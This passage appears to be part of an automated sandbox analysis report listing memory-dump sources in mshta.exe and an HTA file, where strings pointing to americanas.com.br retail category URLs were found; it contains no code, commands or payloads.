Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578601158.000000000BDE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512492941.000000000BDE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510268517.000000000BDC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/grill-e-sanduicheira?chave=pfm_hm_tt_1_0_gri
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509110042.00000000095FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574215733.0000000009604000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512897588.00000000095FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511109691.00000000095FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/liquidificador?chave=pfm_hm_tt_1_0_liquidifi
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000BFF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551073460.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/maquina-de-costura?chave=pfm_hm_tt_1_0_maqui
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507926809.000000000BE97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579004367.000000000BE5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508517476.000000000BE57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502799829.000000000BE56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/mixer?chave=pfm_hm_tt_1_0_mixer
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542146842.000000000BE13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578758949.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551073460.000000000AB5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/processador-de-alimentos?chave=pfm_hm_tt_1_0
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510715620.000000000BE7A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis?chave=dk_hm_at_eletroportateis
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507926809.000000000BE97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555859176.000000000BDFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578720986.000000000BE00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis?chave=pfm_hm_tt_1_0_portateis
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis?chave=pfm_home_portateis_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541572740.000000000A9F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12552919479.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550560614.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511077657.000000000BE92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509074640.000000000BE8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559750595.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/almofada-natalina
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/arvores-de-natal
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/bolas-de-natal
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574416086.000000000960B000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/enfeites-para-arvore
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511077657.000000000BE92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 